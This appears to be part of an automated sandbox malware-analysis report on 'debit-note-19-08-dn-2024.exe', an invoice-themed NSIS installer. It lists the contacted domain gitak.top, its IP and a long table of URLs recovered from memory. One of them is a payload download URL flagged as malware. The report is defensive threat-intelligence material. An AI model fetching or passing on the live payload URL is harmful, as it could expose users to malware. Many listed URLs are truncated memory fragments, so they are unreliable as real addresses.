https://gitak.top/KGukxUu155.bin/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gitak.top	172.67.207.219	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://gitak.top/KGukxUu155.bin	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	debit-note-19-08-dn-2024.exe, 00000002.00000003.12739260417.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15470510829.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12633967289.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11897223878.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15156086659.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.0000000007570000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14841282529.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15680230484.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000753780.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15365675266.0000000005C53000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gitak.top/KGukxUu155.bin~5	debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.bincy	debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/u	debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/	debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/m	debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.bin/u	debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.binificateChainPolicy	debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://nsis.sf.net/NSIS_ErrorError	debit-note-19-08-dn-2024.exe, 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmp, debit-note-19-08-dn-2024.exe, 00000000.00000000.10626867806.0000000000409000.00000008.00000001.01000000.00000003.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000000.10746285611.0000000000409000.00000008.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD	debit-note-19-08-dn-2024.exe, 00000002.00000001.10747980655.0000000000626000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
https://gitak.top/a	debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.binR	debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.cloudflare.com/5xx-error-landing	debit-note-19-08-dn-2024.exe, 00000002.00000003.12739260417.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12633967289.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160436121.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11897223878.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265722845.0000000005BF7000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15156086659.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11476497728.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.0000000007570000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14841282529.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000753780.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11581843152.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15365675266.0000000005C53000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gitak.top/KGukxUu155.bin/KGukxUu155.binID=	debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.binl	debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.bink	debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.bin/KGukxUu155.bin	debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.binm	debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.bin/a	debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.bin)	debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.binID=	debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.bin#	debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.bin/m	debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.bine	debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.bin_	debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.bina	debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.bino(	debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.quovadis.bm0	debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gitak.top/KGukxUu155.bin:	debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ocsp.quovadisoffshore.com0	debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gitak.top/KGukxUu155.bin?o	debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.bin~53	debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.binu	debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.bin0	debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
